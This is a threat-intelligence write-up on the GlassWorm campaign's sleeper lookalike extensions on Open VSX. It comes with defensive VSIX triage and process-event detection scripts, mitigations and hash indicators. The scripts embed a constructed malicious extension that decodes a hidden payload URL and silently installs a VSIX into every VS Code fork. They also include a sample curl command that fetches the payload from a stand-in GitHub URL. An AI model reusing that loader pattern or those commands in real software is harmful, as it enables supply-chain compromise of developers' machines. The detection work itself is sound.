73 Open VSX Sleeper Extensions Linked to Malware Show New Activations
The GlassWorm campaign targeting the Open VSX marketplace has escalated with 73 newly identified impersonation extensions. These "sleeper" extensions were published without any malicious payload, from newly created GitHub accounts, so that they would look benign while building trust and credibility. At least six have since been activated: a later version carried the malware, and the editors' normal update mechanism delivered it to existing installs. Each extension clones a popular legitimate listing (similar name, branding, icon and description), so a user comparing listings at a glance is unlikely to notice the substitute. The threat actor has also moved delivery away from loaders embedded in the extension itself toward three other paths: transitive delivery, where a benign-looking extension declares a malicious one as an extension dependency that the editor installs alongside it; retrieval of VSIX packages hosted on GitHub; and execution of native binaries. Some variants carry obfuscated JavaScript that decodes the payload location at runtime rather than storing it in plain text. The malicious code targets VS Code and its forks Cursor, Windsurf and VSCodium, and installs the downloaded extensions by invoking each editor's command-line interface.
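The delivery paths described above (a dependency pulled in via the manifest, a GitHub-hosted VSIX whose URL is decoded at runtime, a native binary, and installation through each fork's CLI) all leave traces in the VSIX package itself. The triage script below is an added example, not tooling from the Socket report, from Open VSX or from the campaign; it relies only on the VSIX layout (a zip with the manifest at extension/package.json). The suspicious-pattern list, the sample package, its publisher name, dependency ID and payload URL are constructed for illustration and are not indicators from the report.

```python
"""Static triage of a VSIX package for the delivery tricks described above."""
import base64
import binascii
import io
import json
import re
import zipfile

# A VSIX is a zip; the extension manifest sits at extension/package.json.
MANIFEST = "extension/package.json"
NATIVE_EXT = (".exe", ".dll", ".so", ".dylib", ".node")

# Patterns matching the report's observations: IDE CLI installs, process
# spawning, GitHub-hosted VSIX fetches, decoding and dynamic code at runtime.
SUSPICIOUS_JS = {
    "ide_cli_install": re.compile(r"--install-extension"),
    "spawns_process": re.compile(r"\b(?:child_process|spawn|spawnSync|exec|execSync|execFile)\b"),
    "github_vsix_url": re.compile(r"https?://(?:raw\.githubusercontent\.com|github\.com)/\S*?\.vsix", re.I),
    "runtime_decode": re.compile(r"(?:Buffer\.from\([^)]*['\"]base64['\"]\)|\batob\(|String\.fromCharCode\()"),
    "dynamic_eval": re.compile(r"\b(?:eval|new Function)\s*\("),
}
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{24,}={0,2})['\"]")


def decoded_vsix_urls(js_text):
    """Decode base64-looking string literals; return those hiding a VSIX URL."""
    hits = []
    for lit in B64_LITERAL.findall(js_text):
        try:
            raw = base64.b64decode(lit, validate=True)
        except binascii.Error:
            continue
        if raw.startswith(b"http") and raw.lower().endswith(b".vsix"):
            hits.append(raw.decode("ascii", "replace"))
    return hits


def audit_vsix(vsix_bytes, trusted_publishers=frozenset()):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(vsix_bytes)) as zf:
        names = zf.namelist()
        if MANIFEST not in names:
            return ["malformed: extension/package.json missing"]
        pkg = json.loads(zf.read(MANIFEST))
        if pkg.get("publisher") not in trusted_publishers:
            findings.append(f"publisher not on allowlist: {pkg.get('publisher')}")
        # Transitive delivery: declared dependencies and packs are installed
        # automatically alongside this extension.
        for dep in pkg.get("extensionDependencies", []) + pkg.get("extensionPack", []):
            findings.append(f"extension dependency: {dep}")
        if "*" in pkg.get("activationEvents", []):
            findings.append("activates on every editor start (activationEvents '*')")
        for n in names:
            if n.lower().endswith(NATIVE_EXT):
                findings.append(f"native binary: {n}")
            elif n.endswith((".js", ".cjs", ".mjs")):
                text = zf.read(n).decode("utf-8", "replace")
                for label, rx in SUSPICIOUS_JS.items():
                    if rx.search(text):
                        findings.append(f"{label}: {n}")
                for url in decoded_vsix_urls(text):
                    findings.append(f"encoded_vsix_url: {url}")
    return findings


def build_sample_vsix():
    """Constructed sample, not a real artifact: a lookalike from a new publisher
    that drags in a dependency, hides a GitHub VSIX URL in base64 and installs
    it into every VS Code fork through that fork's CLI (download step omitted)."""
    url = "https://github.com/example-org/example-repo/releases/download/v1/payload.vsix"
    encoded = base64.b64encode(url.encode()).decode()
    pkg = {"name": "python-lookalike", "publisher": "fresh-account-2026",
           "version": "1.0.3", "engines": {"vscode": "^1.80.0"},
           "activationEvents": ["*"], "main": "./out/extension.js",
           "extensionDependencies": ["fresh-account-2026.companion-helper"]}
    js = f"""
const cp = require("child_process");
const u = Buffer.from("{encoded}", "base64").toString();   // payload URL decoded at runtime
exports.activate = () => {{
  for (const cli of ["code", "cursor", "windsurf", "codium"]) {{
    try {{ cp.execSync(`${{cli}} --install-extension /tmp/p.vsix`); }} catch (e) {{}}
  }}
}};
"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("extension.vsixmanifest", "<PackageManifest/>")
        zf.writestr(MANIFEST, json.dumps(pkg))
        zf.writestr("extension/out/extension.js", js)
        zf.writestr("extension/bin/helper.node", b"\x7fELF")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in audit_vsix(build_sample_vsix(), trusted_publishers={"ms-python"}):
        print(finding)
```

On the sample, the plaintext GitHub URL signature does not fire, because the URL is base64-encoded; that is exactly what the runtime-decoding variants rely on, and it is the decoder pass over string literals that surfaces it. Hashes of known samples remain the surest indicator, but this kind of manifest-and-source triage catches the next lookalike before a hash exists.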
AI Analysis
Technical Summary
This campaign adds 73 newly identified malicious extensions on the Open VSX marketplace that impersonate popular legitimate extensions by cloning their branding, icons and descriptions. The extensions were published clean, from new GitHub accounts, to build credibility, and at least six have since been activated: a later version carried the malware and reached existing installs through the editors' standard update process. Compared with the earlier embedded-loader approach, delivery has moved toward transitive delivery (a malicious extension pulled in as a declared dependency), retrieval of VSIX packages hosted on GitHub, and native binary execution, with some variants using obfuscated JavaScript to decode the payload location only at runtime. The malware is IDE-aware: it targets VS Code, Cursor, Windsurf and VSCodium and installs the downloaded extensions into each through that editor's command-line interface.
Potential Impact
The campaign gives the attacker code execution inside developer environments, delivered through what looks like a trusted extension update on Open VSX. Extension code runs with the full privileges of the user running the editor, so a successful activation exposes whatever that user can reach: source code, tokens and keys in the shell environment and home directory, and the build and deployment tooling on the machine, which in turn makes downstream supply-chain compromise possible. Because the listings mimic well-known extensions and the payload is obfuscated and fetched at runtime, a compromised install can persist undetected for a long time, leaving the attacker free to push further payloads through the same update channel.
Mitigation Recommendations
There is nothing to patch: the campaign abuses normal marketplace publishing and extension update behaviour rather than a flaw in the editors, so the controls are policy and monitoring. Treat Open VSX extensions from recently created publishers with suspicion, especially where a listing closely resembles a well-known extension; compare the publisher namespace and repository link against the original before installing, not just the name and icon. Review a candidate's package.json for extensionDependencies and extensionPack entries, since those are installed automatically alongside it. Where the editor supports it, enforce a publisher or extension allowlist (for example VS Code's `extensions.allowed` setting or an equivalent managed policy) so that unknown publishers cannot be installed at all, and restrict VSIX file installs to packages staged in an approved internal location. Monitor for the editor command-line launchers (code, cursor, windsurf, codium) being invoked with --install-extension by a process that is not an interactive user session, and for .vsix downloads from GitHub release URLs on developer hosts. Hunt for the hashes listed under Indicators of Compromise and remove affected extensions from every editor installed on the host, because the payload installs into each IDE it finds. Organizations should treat IDE extensions as part of the software supply chain and apply the same review and inventory controls to them as to package dependencies.
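The monitoring recommendation above can be turned into concrete detection logic. The script below is an added example, not part of the report or of any vendor product. It assumes a Sysmon/EDR-style process-creation event with parent image, image, command line, host and user; it assumes the VS Code forks keep the `--install-extension` flag of VS Code's CLI and the launcher names listed in IDE_BINARIES; and it runs over constructed events, with an approved VSIX directory that is also an assumption.

```python
"""Detection logic for the install behaviour described above, run over
constructed process-creation events."""
import re
import shlex
from collections import defaultdict

# CLI launcher names of VS Code and the forks named in the report (assumed
# from their Linux/Windows binary names; .exe and directories are stripped).
IDE_BINARIES = {"code", "code-insiders", "codium", "vscodium", "cursor", "windsurf"}
GITHUB_VSIX = re.compile(r"https?://(?:raw\.githubusercontent\.com|github\.com)/\S*?\.vsix", re.I)
# Constructed allowlist: VSIX files staged here by internal tooling are expected.
APPROVED_VSIX_DIRS = ("/opt/approved/",)


def base(image):
    """'C:\\...\\Code.exe' or '/usr/bin/code' -> 'code'."""
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def install_target(cmdline):
    """Return the value passed to --install-extension, or None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        argv = cmdline.split()
    for i, arg in enumerate(argv):
        if arg == "--install-extension" and i + 1 < len(argv):
            return argv[i + 1]
        if arg.startswith("--install-extension="):
            return arg.split("=", 1)[1]
    return None


def classify(ev, approved_dirs=APPROVED_VSIX_DIRS):
    """Per-event reasons; an empty list means the event is unremarkable."""
    reasons = []
    parent, cmd = base(ev["parent_image"]), ev["command_line"]
    target = install_target(cmd)
    if target is not None:
        if parent in IDE_BINARIES:
            # The editor itself (i.e. an extension running inside it) ran the
            # CLI, rather than a person at a shell.
            reasons.append("install_spawned_by_ide")
        if target.lower().endswith(".vsix") and not target.startswith(approved_dirs):
            # A file path rather than a marketplace ID: bypasses the registry entirely.
            reasons.append("install_from_local_vsix")
    if GITHUB_VSIX.search(cmd):
        reasons.append("vsix_fetched_from_github")
    return reasons


def fanout_alerts(events, min_ides=2):
    """One VSIX file installed into several editors by the same user on one host."""
    seen = defaultdict(set)
    for ev in events:
        target = install_target(ev["command_line"])
        if target and target.lower().endswith(".vsix") and base(ev["image"]) in IDE_BINARIES:
            seen[(ev["host"], ev["user"], target)].add(base(ev["image"]))
    return [
        {"host": h, "user": u, "target": t, "ides": sorted(ides)}
        for (h, u, t), ides in sorted(seen.items()) if len(ides) >= min_ides
    ]


# Constructed sample events (Sysmon/EDR-style shape assumed), not real telemetry.
_CODE = "/usr/share/code/code"
SAMPLE_EVENTS = [
    {"host": "dev-01", "user": "alice", "parent_image": "/usr/bin/bash", "image": "/usr/bin/code",
     "command_line": "code --install-extension ms-python.python"},
    {"host": "dev-01", "user": "alice", "parent_image": _CODE, "image": "/usr/bin/curl",
     "command_line": "curl -sL https://github.com/example-org/example-repo/releases/download/v1/payload.vsix -o /tmp/.cache/p.vsix"},
    {"host": "dev-01", "user": "alice", "parent_image": _CODE, "image": "/usr/bin/code",
     "command_line": "code --install-extension /tmp/.cache/p.vsix"},
    {"host": "dev-01", "user": "alice", "parent_image": _CODE, "image": "/usr/bin/cursor",
     "command_line": "cursor --install-extension /tmp/.cache/p.vsix"},
    {"host": "dev-01", "user": "alice", "parent_image": _CODE, "image": "/usr/bin/codium",
     "command_line": "codium --install-extension /tmp/.cache/p.vsix"},
    {"host": "ci-07", "user": "runner", "parent_image": "/usr/bin/bash", "image": "/usr/bin/codium",
     "command_line": "codium --install-extension /opt/approved/corp-lint-1.2.0.vsix"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(base(ev["image"]), classify(ev))
    print(fanout_alerts(SAMPLE_EVENTS))
```

The per-event rules are cheap and fire on the first install; the fan-out rule is the higher-confidence signal for this campaign specifically, because a human installs one extension into one editor, whereas the payload installs the same VSIX into every fork it finds. The approved-directory exception is what keeps a CI runner that legitimately installs an internal VSIX from paging anyone.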
Indicators of Compromise
- sha256: 4ebfe8f66ca7e9751060b3301b5e8838d6017593cdae748541de83bfa28183bd
- md5: 28d59940483fa3bea0599ce55aa86245
- sha1: c074880abdbf87a9fd2e1393d4cb36c32f1f8f58
- sha256: 1b62b7c2ed7cc296ce821f977ef7b22bae59ef1dcdb9a34ae19467ee39bcf168
- sha256: 97c275e3406ad6576529f41604ad138c5bdc4297d195bf61b049e14f6b30adfd
(Hash algorithms are inferred from digest length; the source does not say which file each hash belongs to.)
Technical Details
- Author: AlienVault
- TLP: white
- References: https://socket.dev/blog/73-open-vsx-sleeper-extensions-glassworm
- Adversary: GlassWorm
- Pulse Id: 69ef8c5eed11e8689f663f34
- Threat Score: null
Threat ID: 69ef8f0dba26a39fba414088
Added to database: 4/27/2026, 4:30:05 PM
Last enriched: 4/27/2026, 4:45:17 PM
Last updated: 4/28/2026, 1:47:35 AM
Views: 44